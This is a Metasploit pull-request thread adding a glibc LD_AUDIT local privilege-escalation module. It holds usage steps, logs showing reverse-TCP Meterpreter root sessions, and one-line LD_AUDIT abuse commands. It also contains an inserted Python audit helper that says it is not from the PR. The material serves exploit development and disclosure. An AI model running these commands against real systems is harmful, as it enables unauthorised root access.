
Add glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation exploit #9469

Merged
merged 3 commits into from Feb 9, 2018

Conversation

@bcoles
Contributor

bcoles commented Jan 28, 2018

Add glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation exploit.

    This module attempts to gain root privileges on Linux systems by abusing
    a vulnerability in the GNU C Library (glibc) dynamic linker.

    glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not
    properly restrict use of the LD_AUDIT environment variable when loading
    setuid executables. This allows loading arbitrary shared objects from
    the trusted library search path with the privileges of the suid user.

    This module uses LD_AUDIT to load the libpcprofile.so shared object,
    distributed with some versions of glibc, and leverages arbitrary file
    creation functionality in the library constructor to write a root-owned
    world-writable file to a system trusted search path (usually /lib).
    The file is then overwritten with a shared object, which is then loaded
    with LD_AUDIT, resulting in arbitrary code execution.

    This module has been tested successfully on glibc version 2.11.1 on
    Ubuntu 10.04 x86_64.

    RHEL 5 and Debian 5 are reportedly affected, but untested. Some glibc
    distributions do not contain the vulnerable libpcprofile.so library.

Verification

  • Start msfconsole
  • Get a session
  • use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc
  • set SESSION <ID>
  • run
  • Verify you get a root session

Example Output

msf5 exploit(multi/handler) > use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc 
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[+] The target appears to be vulnerable
[*] Using target: Linux x64
[*] Writing '/tmp/.GQh1C8euY' (1913 bytes) ...
[*] Writing '/tmp/.3l76zsoHT' (246 bytes) ...
[*] Writing '/tmp/.WSuOVyo' (207 bytes) ...
[*] Launching exploit...
[*] Sending stage (857352 bytes) to 172.16.191.149
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.149:45721) at 2018-01-27 23:59:36 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.149
OS           : Ubuntu 10.04 (Linux 2.6.32-21-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
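The description above states the affected range (ld.so before 2.11.3, and 2.12.x before 2.12.2) and names the DSOs whose constructors make the issue exploitable (libpcprofile.so, and libmemusage.so later in the thread). The following audit helper is an added example, not code from this PR or from the Metasploit module: it turns that range into a version check a defender can run over inventory data, and reports whether the named DSOs are present in the trusted search path. The directories /lib64 and /usr/lib are assumptions for a typical x86_64 layout; the page only names /lib. It generalizes the single 2.11.1 case in the thread to the whole stated range.

```python
"""Audit helper for the glibc LD_AUDIT issue discussed in the PR thread.

Added example (not part of the PR or the Metasploit module). It decides
whether a glibc version string falls in the affected range stated in the
module description and reports which of the thread's named DSOs are
present in the trusted library search path.
"""
import os
import re
from typing import Dict, Iterable, List, Tuple

# DSOs the thread names as having constructors that are unsafe under LD_AUDIT.
AUDIT_DSOS = ("libpcprofile.so", "libmemusage.so")

# Trusted search path: /lib comes from the page; /lib64 and /usr/lib are
# assumptions for a typical x86_64 layout.
DEFAULT_SEARCH_DIRS = ("/lib", "/lib64", "/usr/lib")


def parse_version(text: str) -> Tuple[int, int, int]:
    """Extract (major, minor, patch) from a bare version such as '2.11.1' or
    from a banner like 'GNU C Library (Ubuntu EGLIBC 2.11.1-0ubuntu7) ...'.
    A missing patch component is treated as 0."""
    m = re.search(r"\b(\d+)\.(\d+)(?:\.(\d+))?\b", text)
    if not m:
        raise ValueError("no glibc version found in: %r" % text)
    major, minor, patch = m.group(1), m.group(2), m.group(3) or "0"
    return int(major), int(minor), int(patch)


def is_affected(version: Tuple[int, int, int]) -> bool:
    """True when the version lies in the range the module description gives:
    anything before 2.11.3, or a 2.12.x release before 2.12.2."""
    major, minor, patch = version
    if major != 2:
        # Only the 2.x series is described; anything else is treated as unknown/unaffected.
        return False
    if (major, minor, patch) < (2, 11, 3):
        return True
    if minor == 12 and patch < 2:
        return True
    return False


def find_audit_dsos(search_dirs: Iterable[str] = DEFAULT_SEARCH_DIRS) -> List[str]:
    """Return full paths of the named DSOs that exist in the given directories."""
    found = []
    for d in search_dirs:
        for name in AUDIT_DSOS:
            path = os.path.join(d, name)
            if os.path.isfile(path):
                found.append(path)
    return found


def audit_report(version_text: str, present_dsos: Iterable[str]) -> Dict[str, object]:
    """Pure summary: a host is 'exposed' only if its glibc is in the affected
    range AND at least one of the named DSOs is installed (the thread notes
    some distributions ship neither library)."""
    version = parse_version(version_text)
    affected = is_affected(version)
    dsos = list(present_dsos)
    return {
        "version": "%d.%d.%d" % version,
        "version_affected": affected,
        "dsos_present": dsos,
        "exposed": affected and len(dsos) > 0,
    }


if __name__ == "__main__":
    # Constructed banner in the format `ldd --version` prints on the tested Ubuntu 10.04 host.
    banner = "ldd (Ubuntu EGLIBC 2.11.1-0ubuntu7) 2.11.1"
    print(audit_report(banner, find_audit_dsos()))
```

Run it on a host to combine the live filesystem scan with the version check; in inventory pipelines call `audit_report` directly with the version string and a precomputed list of library paths.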
@sempervictus
Contributor

sempervictus commented Jan 28, 2018

You really like being root eh? :)
I wonder if there's a way to search on-host libs for the relevant function imports to make this work on targets lacking libpcprofile. Resolve imports or something; libs should be readable by unprivileged users.

@bcoles
Contributor Author

bcoles commented Jan 28, 2018

@sempervictus MSF linux local EoP needed some love.

As for on-host detection of libraries - Tavis discusses some techniques to find libraries with constructors programmatically using objdump / gdb. However, the library would need to be disassembled, or the source code reviewed, to find a suitable attack vector.

From Tavis' advisory:

[...] can be exploited by locating a DSO in the trusted search path with
initialization code that has not been designed to operate safely while euid !=
uid.

Disassembling and analyzing potentially viable libraries programmatically on-host on-the-fly without access to the application source code would be cool, but well beyond the scope of this PR.

Instead, additional known-vulnerable libraries could be added to the module as targets in the future.


Tavis pointed out liblftp-tasks.so.0 can be used to create arbitrary directories:

LD_AUDIT="liblftp-tasks.so.0" LFTP_HOME=/etc/exploit ping


Similarly, Todor Donev pointed out that libmemusage.so, also distributed with glibc, is vulnerable in the same way as libpcprofile.so:

LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="$OUTPUT" ping


It seems that systems without libpcprofile.so were also missing libmemusage.so, so I simply opted for the former rather than support both.

@sempervictus
Contributor

sempervictus commented Jan 28, 2018

On-target disassembly and analysis is probably something to bring up with @acammack-r7 in the context of mettle internals. Doesn't metasm have something for that?
I'm all for a vuln lib list we can grow over time.

@bcoles bcoles added the delayed label Feb 1, 2018
@bcoles
Contributor Author

bcoles commented Feb 1, 2018

Delayed pending fix for #9482

@bcoles bcoles added docs and removed needs-docs labels Feb 7, 2018
@bcoles bcoles added delayed and removed delayed labels Feb 7, 2018
@bcoles
Contributor Author

bcoles commented Feb 7, 2018

Leaving the delayed tag on this one. There's a bug when running this module on shell sessions I want to fix.

@bcoles bcoles removed the delayed label Feb 8, 2018
@bcoles
Contributor Author

bcoles commented Feb 8, 2018

Fixed bug with shell sessions on Debian. Ready for review.

@h00die
Contributor

h00die commented Feb 9, 2018

Ubuntu 10.04 x64 (only OpenSSH added from ISO install)

msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] GNU C Library version 2.11.1 is vulnerable
[*] Checking for libpcprofile.so in system search paths
[+] Found libpcprofile.so in /lib
[+] /bin/ping is setuid
[+] The target appears to be vulnerable
[*] System architecture is x86_64
[*] Using target: Linux x64
[*] Writing '/tmp/.bOC5g5P' (1913 bytes) ...
[*] Max line length is 65537
[*] Writing 1913 bytes in 1 chunks of 4369 bytes (octal-encoded), using printf
[*] Writing '/tmp/.7NCrLfnfk' (239 bytes) ...
[*] Max line length is 65537
[*] Writing 239 bytes in 1 chunks of 846 bytes (octal-encoded), using printf
[*] Writing '/tmp/.zSNpezl' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (857352 bytes) to 2.2.2.2

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : ubuntu10.04
OS           : Ubuntu 10.04 (Linux 2.6.32-21-server)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
@h00die
Contributor

h00die commented Feb 9, 2018

also worked from meterp shell

@h00die h00die merged commit 5b251ae into rapid7:master Feb 9, 2018
1 check passed
continuous-integration/travis-ci/pr The Travis CI build passed
h00die added a commit that referenced this pull request Feb 9, 2018
@h00die
Contributor

h00die commented Feb 9, 2018

Release Notes

The exploits/linux/local/glibc_ld_audit_dso_load_priv_esc module has been added to the framework. This module abuses a vulnerability in the GNU C Library (glibc) dynamic linker on Ubuntu 10.04 and other similar age operating systems for local privilege escalation.

@h00die
Contributor

h00die commented Feb 9, 2018

Nice work, I was mainly worried I wouldn't be able to get the vuln software, but Ubuntu 10.04 was good to go from ISO.

@bcoles
Contributor Author

bcoles commented Feb 9, 2018

Thanks @h00die

@bcoles bcoles deleted the bcoles:glibc_ld_audit_dso_load_priv_esc branch Feb 9, 2018
@h00die h00die self-assigned this Feb 9, 2018
jmartin-r7 added a commit to jmartin-r7/metasploit-framework that referenced this pull request Feb 12, 2018
4 participants